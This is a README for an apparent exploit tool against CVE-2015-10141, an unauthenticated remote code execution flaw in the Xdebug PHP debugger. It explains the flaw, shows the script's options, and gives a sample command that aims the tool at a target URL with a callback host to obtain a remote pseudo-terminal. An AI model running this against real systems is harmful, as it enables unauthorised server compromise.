# CVE-2015-10141

```
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141
```

## Explanation

An unauthenticated OS command injection vulnerability exists within Xdebug versions 2.5.5 and earlier, a PHP debugging extension. When remote debugging is enabled, Xdebug listens on port 9000 and accepts debugger protocol commands without authentication. An attacker can send a crafted eval command over this interface to execute arbitrary PHP code, which may invoke system-level functions such as system() or passthru(). This results in full compromise of the host under the privileges of the web server user.

## Usage

```
usage: CVE-2015-10141.py [-h] -u URL -l LHOST

CVE-2015-10141 - xdebug v2.5.5 RCE Exploit

options:
  -h, --help         show this help message and exit
  -u, --url URL      URL of the target
  -l, --lhost LHOST  LHOST to trigger the RCE
```

Just execute the exploit and provide a valid URL with a PHP file like `index.php` and the local host. Then the exploit will try to establish a pseudo-terminal which allows you to execute commands remotely

```sh
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3
```

Take into account that in some cases the output won't be reflected at all and you will only see the first line of the executed command, this is not a problem of the script, the vuln works like this)

## References

```
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210
```

## License

This project is under MIT license

Copyright © 2025, *D3Ext*



